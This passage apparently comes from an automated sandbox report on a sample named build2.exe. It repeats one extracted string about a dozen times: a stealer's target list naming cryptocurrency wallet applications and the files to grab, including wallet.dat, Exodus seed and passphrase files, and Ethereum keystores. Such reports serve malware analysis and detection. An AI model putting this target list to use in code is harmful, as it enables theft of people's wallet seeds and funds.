Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
